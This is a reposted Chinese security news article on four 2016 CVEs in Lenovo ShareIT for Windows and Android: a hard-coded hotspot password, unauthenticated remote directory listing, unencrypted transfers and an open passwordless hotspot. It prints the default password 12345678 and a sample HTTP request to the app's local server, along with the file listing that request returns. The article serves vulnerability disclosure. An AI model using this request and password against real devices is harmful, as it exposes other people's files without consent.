转载

联想茄子快传（Lenovo ShareIT）被曝多处漏洞

联想ShareIT（茄子快传）服务被爆有硬编码密码、信息泄露、敏感信息没有加密、未授权漏洞，漏洞提交者为来自Core Security Consulting团队的安全研究员Ivan Huertas，这篇报告来自于同团队的Joaquín Rodríguez Varela。

茄子快传是迄今为止速度最快的跨平台近场传输软件，可支持安卓/苹果/电脑/WP等设备及三十多种国家语言。其操作简单、方便，传输过程中无需流量、无需网络、无需登录账户即可互传文件，传输速度秒杀蓝牙200倍。且是一款能够实现无客户端传输文件的互传软件。茄子快传目前在全球拥有4亿+忠实用户，真正的做到了让用户在生活中随意分享快乐。

已经被验证的存在漏洞的包括茄子快传Android 3.0.18_ww版本，还有茄子快传Windows 2.5.1.1版本，其他版本可能也受影响，但是还没有被验证。不过联想已经发布了更新版本，修复了以上两个版本的漏洞。

1. 联想茄子快传Windows版本硬编码密码 [CVE-2016-1491]

使用Lenovo SHAREit Windows版本接收文件时，wifi热点的密码被设置为了12345678，任何带有无线网卡的系统都可以用该密码连接上此热点，这个密码是默认的！

2. 联想茄子快传Windows版本远程文件浏览 [CVE-2016-1490]

当wifi热点网络被开启并且使用默认密码12345678连接上服务时，通过向茄子快传启动的WebServer服务（类http服务器）发送http请求可以达到读取文件的目的，但是文件不能被下载。以下为请求的数据包：

POST /list?type=file&path=C%3A%5CUsers/admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; XT1032 Build/KXB21.14-L1.40) Host: 192.168.173.1:2999 Connection: Keep-Alivek Accept-Encoding: gzip Content-Length: 0 HTTP/1.0 200 OK Content-Length: 2426    {"containers":[{"filepath":"C://Users//admin//Contacts","has_thumbnail":false,"id":"C://Users//admin//Contacts","isloaded":false,"isroot":false,"isvolume":false,"name":"Contacts","type":"file","ver":""},{"filepath":"C://Users//admin//Desktop","has_thumbnail":false,"id":"C://Users//admin//Desktop","isloaded":false,"isroot":false,"isvolume":false,"name":"Desktop","type":"file","ver":""},{"filepath":"C://Users//admin//Documents","has_thumbnail":false,"id":"C://Users//admin//Documents","isloaded":false,"isroot":false,"isvolume":false,"name":"Documents","type":"file","ver":""},{"filepath":"C://Users//admin//Downloads","has_thumbnail":false,"id":"C://Users//admin//Downloads","isloaded":false,"isroot":false,"isvolume":false,"name":"Downloads","type":"file","ver":""},{"filepath":"C://Users//admin//Favorites","has_thumbnail":false,"id":"C://Users//admin//Favorites","isloaded":false,"isroot":false,"isvolume":false,"name":"Favorites","type":"file","ver":""},{"filepath":"C://Users//admin//Links", "has_thumbnail":false,"id":"C://Users//admin//Links","isloaded":false,"isroot":false,"isvolume":false,"name":"Links","type":"file","ver":""},{"filepath":"C://Users//admin//Music","has_thumbnail":false,"id":"C://Users//admin//Music","isloaded":false,"isroot":false,"isvolume":false,"name":"My Music","type":"file","ver":""},{"filepath":"C://Users//admin//Pictures","has_thumbnail":false,"id":"C://Users//admin//Pictures","isloaded":false,"isroot":false,"isvolume":false,"name":"My Pictures","type":"file","ver":""},{"filepath":"C://Users//admin//Saved Games","has_thumbnail":false,"id":"C://Users//admin//Saved Games","isloaded":false,"isroot":false,"isvolume":false,"name":"Saved Games","type":"file","ver":""},{"filepath":"C://Users//admin//Searches","has_thumbnail":false,"id":"C://Users//admin//Searches","isloaded":false,"isroot":false,"isvolume":false,"name":"Searches","type":"file","ver":""},{"filepath":"C://Users//admin//Tracing","has_thumbnail":false,"id":"C://Users//admin//Tracing","isloaded":false,"isroot":false,"isvolume":false,"name":"Tracing","type":"file","ver":""},{"filepath":"C://Users//admin//Videos","has_thumbnail":false,"id":"C://Users//admin//Videos","isloaded":false,"isroot":false,"isvolume":false,"name":"My ","type":"file","ver":""}],"filepath":"C://Users//admin","has_thumbnail":false,"id":"C://Users//admin","isloaded":true,"isroot":false,"isvolume":false,"name":"admin","type":"file","ver":""}

3. 茄子快传Windows和Android版本通讯过程未加密 [CVE-2016-1489]

通过http进行文件传输时未加密，攻击者可以通过嗅探网络来查看传输的数据或者直接进行中间人攻击，比如篡改传输的内容。

4. 在安卓设备上开启无需密码即可登录的公共wifi [CVE-2016-1492]

当应用被设置成接收文件时，一个无需密码即可登录的公共wifi热点也会被创建，攻击者连上此wifi时可以在这些设备上抓取通讯信息。

*原文地址： packetstormsecurity ，东二门陈冠希/编译，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）

原文 http://www.freebuf.com/articles/terminal/94519.html

正文到此结束